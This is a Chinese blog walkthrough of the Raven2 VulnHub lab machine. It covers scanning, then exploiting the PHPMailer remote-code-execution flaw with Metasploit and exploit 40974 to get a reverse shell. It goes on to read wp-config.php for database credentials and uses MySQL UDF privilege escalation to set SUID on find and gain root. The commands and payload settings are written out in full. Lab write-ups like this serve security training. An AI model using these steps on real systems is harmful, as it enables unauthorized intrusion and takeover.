Raven2靶机渗透

最新推荐文章于 2024-08-16 14:13:16 发布
最新推荐文章于 2024-08-16 14:13:16 发布
阅读量308 收藏 1
点赞数 5
文章标签: android 算法 渗透测试 测试工具 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58954236/article/details/133823316
版权

1. 信息收集

1.1 主机探测

sudo arp-scan -l

image-20231013144649685

1.2 端口扫描

nmap -p- -A 192.168.16.185

image-20231013144904319

开放了80端口,尝试登录网址查看信息,通过浏览器插件找出指纹

image-20231013145409811

image-20231013150539693

1.3 目录扫描

image-20231013151850420

访问登录界面,发现remember Me怀疑是shiro界面

image-20231013151957106

登录/vendor/界面,查看信息

image-20231013152735139

获得flag1和网站的绝对路径

image-20231013152812340

image-20231013153159320

image-20231013154015705

经查找发现PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用

2. 漏洞利用

2.1 msfconsole

搜索漏洞

image-20231013161328136

使用可用目标0,查看需要设置什么

按照需求配置参数,先配置靶机的IP和邮箱功能页面和绝对路径,在查看设置可以发现kali反弹shell的IP是本机IP

	options
	set RHOSTS 192.168.16.185	  #靶机地址
	set TARGETURI /contact.php    #邮件功能页面
	set WEB_ROOT /var/www/html    #网站绝对路径
	set payload php/meterpreter/reverse_tcp	  #设置payload
	set LHOST 192.168.16.176     #kali地址
	run

image-20231013162530243

searchsploit phpmailer

image-20231013164007026

脚本需要进行一些修改,需要知道网站的绝对路径,能够在前面vendor下的PATH中能够得到flag1和网站的绝对路径

image-20231013171509692

python3 ./40974.py

运行脚本后,使用攻击机监听4444端口

nc -lvvp 4444

访问http://192.168.16.185/dayu.php就会获得反弹shell

image-20231013172034005

image-20231013172023041

使用find命令搜索一下flag文件,得到flag2和flag3

find / -name *flag* 2>/dev/null

image-20231013172340223

获得交互式的shell

python -c 'import pty; pty.spawn("/bin/bash")'

在网站根目录下查看数据库配置文件

cd /var/www/html/
ls
cd wordpress
ls
cat wp-config.php

image-20231013175127314

2.2 数据库UDF提权

登录数据库

user:root
password:R@v3nSecurity

mysql -uroot -pR@v3nSecurity

image-20231013175452909

尝试mysql的udf提权

udf = 'user defined function’即‘用户自定义函数’。
通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。
udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。

提权思路:

  • 将udf文件放到指定位置(Mysql>5.1放在Mysql根目录的lib\plugin文件夹下)
  • 从udf文件中引入自定义函数(user defined function)
  • 执行自定义函数

查看secure_file_prive

查看是否满足写入权限:secure_file_prive是否为空

show global variables like 'secur%';

image-20231013180030163

查看插件目录

show variables like '%plugin%';

image-20231013180755672

查看是否存在远程登录

use mysql
select user,host from user;

没有远程登录

image-20231013180958820

只允许本地登录,所以不能使用msf进行提权了,使用searchsploit查看漏洞脚本

searchsploit mysql udf

image-20231013185153962

找到提权的脚本,将1518移动到桌面并对c文件进行编译

编译命令

gcc -g -c /home/ycx/Desktop/1518.c
gcc -g -shared -o 1518.so 1518.o -lc

image-20231013190300636

image-20231013190658487

python开启http服务

python -m http.server 8888

靶机的shell终端进行文件下载
要在/tmp目录下载

cd /tmp
wget http://192.168.16.132:8888/1518.so

image-20231013191104703

再次登录数据库,并使用以下命令创建自定义函数

# 连接mysql数据库
mysql -uroot -pR@v3nSecurity
# 使用mysql数据库
use mysql;
# 创建foo表
create table foo(line blob);
# 往foo表中插入二进制的1518.so
insert into foo values(load_file('/tmp/1518.so'));
# 导出1518.so
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
# 创建do_system自定义函数
create function do_system returns integer soname '1518.so';
# 调用do_system函数给find命令所有者的suid权限,使其执行root
select do_system('chmod u+s /usr/bin/find');
# 导入成功后可查看一下 mysql 函数里面是否新增了do_system:
select * from mysql.func;

image-20231013192511615

在tmp目录下利用find命令执行whoami,发现当前权限是root权限;使用find命令获取root权限的shell

touch 11
find 11 -exec "whoami" \;
find 11 -exec "/bin/sh" \;

image-20231013193534264

网安咸鱼1517
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Raven 2 靶机渗透
weixin_41082546的博客
08-24 1402
0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 0x01 发现存活主机 该虚拟机默认是NAT模式...
raven2靶机渗透
my的博客
10-16 331
kaliraven靶机:链接:https://download.vulnhub.com/raven/Raven2.ova。
VulnHub-Raven:2靶机渗透
ce666666的博客
02-04 3864
前言 通过VulnHub-Raven:2靶机渗透学习 攻击机:kali 靶机:Raven 网段:192.168.123.0/24 知识点: PHPMailer 小于5.2.18 (CVE-2016-10033) UDF提权 工具: LinEnum——Linux枚举漏洞工具 dirsearch——目录扫描工具 CVE-2016-10033 原理:PHPMailer mail()函数功能,远程攻击者利用默认开启的PHPMailer可以运行构造的恶意代码,无需登录触发该漏洞,从而导致获取系统权限。
Raven2靶机练习
SYJ_361的博客
03-27 1302
本文是对Raven2靶机的练习,通过phpmailer**CVE-2016-10033远程代码执行漏洞利用**进行反弹shell,通过控制mysql,对靶机权限进行提权,最后得到靶机里面的flag文件
Android逆向题解攻防世界-easy-apk
u013170888的博客
08-14 175
魔改码表与标准码表参照对比,将加密字符串还原成标准码表编码的字符串,再标准base64解码即可。运行结果:flag{05397c42f9b6da593a3644162d36eb01}题目比较简单,就是一个改了码表的base64编码。
Jetpack Compose实战教程(六)
xiaoliluote的专栏
08-13 654
我们在写xml布局的时候,经常会用到android:margin属性,毕竟除了居中以外,固定位置的偏移就得用到margin,xml中我们使用margin来设置外边距,使用padding来设置内边距。但在compose中,没有了margin属性,只有一个padding,那么我们如何设置外边距和内边距呢?
说一下Matrix
challenge51all的专栏
08-13 285
需注意,确保按照实际情况配置相关文件路径和参数,并根据项目的特定需求选择合适的插件和功能。同时,随着 Matrix 版本的更新,可能会有一些细节上的变化,建议参考最新的官方文档和项目示例进行集成和使用。总之,Matrix 为 Android 开发者提供了强大的性能监控和优化工具,有助于提升应用的质量和用户体验。不同的插件具有不同的功能和使用方式,具体的使用细节可以参考 Matrix 的官方文档和相关示例。通常需要在项目中引入相关的依赖,进行配置和初始化,然后就可以在应用运行过程中收集性能数据。
[PHP]-Laravel中Group By引发的问题思考
hmx224_2014的专栏
08-16 242
Laravel 和 ThinkPHP 是两个不同的 PHP 框架,它们在底层使用了相同的 SQL 查询语言来与数据库交互。然而,由于框架的设计和实现方式不同,它们在生成 SQL 查询时可能会表现出一些细微的差异,包括对GROUP BY 子句的处理。在调用查询公司在线报告接口时,发现我请求的数据室20条每页,但是经查询存在16,17条的都有,并且后几页也不稳定,就一直查询问题。
无字母数字webshell之命令执行
qq_51502737的博客
08-12 722
因为不能使用了,所以我们无法构造PHP中的变量。所以,如何解决这个问题?
Android声音播放与录制
最新发布
轻口味的专栏
08-16 469
例如你在听music的时候接到电话,这个时候music播放肯定会停止,此时你只能听到电话,如果你调节音量的话,这个调节肯定只对电话起作用。当电话打完了,再回到music,你肯定不用再调节音量了。而STATIC的意思是一开始创建的时候,就把音频数据放到一个固定的buffer,然后直接传给audiotrack,后续就不用一次次得write了。其实系统将这几种声音的数据分开管理,所以,这个参数对AudioTrack来说,它的含义就是告诉系统,我现在想使用的是哪种类型的声音,这样系统就可以对应管理他们了。
Android笔试面试题AI答之Kotlin(14)
学无止境,止于至善
08-16 646
在Kotlin中,定义函数(Function)还是属性(Property)主要取决于你想要表达的行为或数据的本质。在Kotlin中,@Metadata注解是一个非常重要的组成部分,它主要用于存储Kotlin编译器生成的关于Kotlin声明的元数据。这些元数据对于Kotlin和Java之间的互操作性尤为重要,因为它们允许Java代码理解Kotlin代码的结构,如属性、默认参数、空安全等特性。
thinkphp8反序列化分析
2301_79724395的博客
08-12 754
摆了一个暑假,正好看见周会有人分析了tp反序列化,想起这条链子的发现者就是我尊敬的nivia,这不得好好分析一下,而且师傅也是分析了这个,所以有了这个文章。
安卓中Room持久化库的使用
故事不长丨的博客
08-13 488
Android开发中,Room是Google提供的一个持久化库,旨在为应用提供SQLite的抽象层,以简化数据库的访问和操作。相比直接使用SQLite,Room提供更清晰、更简洁的数据库访问机制。
thinkphp 附表和附表的外键id都是逗号分割的字符串的关联查询
hanzhuhuaa的博客
08-15 154
文章表的标签是2,3 或者1或者2进行关联查询。例如企业表的标签是1,2,3。
android中实现禁掉有线网络
JiYaRuo的博客
08-15 164
1.首先初始化mINetworkManagementServiceProxy。如果报错,抛出安全异常的话,需要添加权限:(我没有添加也是可以的)可能是只有system app可以使用,但不确定,待验证!2.初始化完成后,打开关闭eth0。
Composer:PHP生态中的交响乐指挥家
2401_85342379的博客
08-12 597
Composer是PHP的依赖管理器,它允许开发者声明项目所需的库,这些库被称为“包”。通过Composer,开发者可以轻松地安装、更新和管理这些包,而无需手动下载和配置。在你的项目根目录下,创建一个这个文件告诉Composer你的项目需要PHP 7.1.0或更高版本,以及Monolog日志库。
Unity 编写自己的aar库,并通过AndroidJavaProxy调用访问和返回
thinbug的专栏
08-12 406
我们首先创建一个空项目,我们不需要Activity,所以可以选择NoActivity。输入一个包名,我们用不到这个主app包名。项目创建好后,再创建新Module左边我们选择AndroidLibrary,然后输入包名,这个包名在Unity中需要输入。然后我们编写两个脚本,一个是Interface,一个是类。这里要注意,在Unity中我们通过AndroidJavaProxy调用的只能是interface。然后我们直接Build生成的arr会在。
php的多态
weixin_39289004的博客
08-13 202
通过接口,PHP 实现了多态,使得同一函数可以处理不同类型的对象,提升了代码的灵活性和可扩展性。
OSCP实战:Raven2靶机渗透及PHPMailer漏洞利用
以下是Raven2渗透过程的详细步骤: **信息侦察阶段** 首先,渗透者会使用工具如dirb对目标主机(172.16.100.142)进行信息搜集。Dirb是一个用于目录遍历的脚本,通过检测目录的存在性和可列出性,帮助识别潜在的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安咸鱼1517

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值